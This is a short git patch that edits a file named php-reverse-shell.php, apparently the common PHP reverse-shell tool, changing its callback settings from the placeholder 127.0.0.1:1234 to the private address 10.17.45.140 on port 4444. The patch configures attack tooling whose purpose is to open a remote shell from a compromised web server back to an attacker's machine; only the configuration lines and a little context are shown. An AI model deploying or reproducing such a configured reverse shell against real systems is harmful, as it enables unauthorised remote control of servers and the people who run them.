From e6422057514aac07f9307a4aaa9d852cedec412a Mon Sep 17 00:00:00 2001 From: JUST A TECHIE Date: Fri, 7 Jul 2023 00:29:41 +0300 Subject: [PATCH] Update php-reverse-shell.php --- php-reverse-shell.php | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/php-reverse-shell.php b/php-reverse-shell.php index 2503b71..df61eb4 100755 --- a/php-reverse-shell.php +++ b/php-reverse-shell.php @@ -46,8 +46,8 @@ set_time_limit (0); $VERSION = "1.0"; -$ip = '127.0.0.1'; // CHANGE THIS -$port = 1234; // CHANGE THIS +$ip = '10.17.45.140 '; // CHANGE THIS +$port = 4444; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null;